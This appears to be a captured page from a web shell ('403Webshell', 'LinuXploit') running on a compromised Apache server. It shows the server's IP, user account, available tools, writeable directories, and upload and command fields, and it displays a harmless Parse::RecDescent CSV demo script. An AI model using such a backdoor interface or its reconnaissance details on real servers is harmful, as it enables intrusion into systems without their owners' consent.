403Webshell
Server IP : 217.160.0.143  /  Your IP : 216.73.217.84
Web Server : Apache
System : Linux info 3.0 #1337 SMP Tue Jan 01 00:00:00 CEST 2000 all GNU/Linux
User : u89353126 ( 3190106)
PHP Version : 8.2.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/share/doc/libparse-recdescent-perl/examples/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/doc/libparse-recdescent-perl/examples/demo_PerlCSV.pl
#!/usr/bin/perl -w

use Parse::RecDescent;

my $PCSV_parser = Parse::RecDescent->new(<<'EOGRAMMAR');

	file:	<skip: '[ \t]*'> line(s?)

	line:	field(s? /,|=>/) "\n" 	{ $item[1] }

	field:	<perl_quotelike>	{ join "", @{$item[1]} }
	     |	/((?!,|=>).)*/

EOGRAMMAR

use Data::Dumper;

print  Data::Dumper->Dump($PCSV_parser->file(join "", <DATA>));

__DATA__
comma,separated=>values
with,q{a,perl,twist},/to them/

Youez - 2016 - github.com/yon3zu
LinuXploit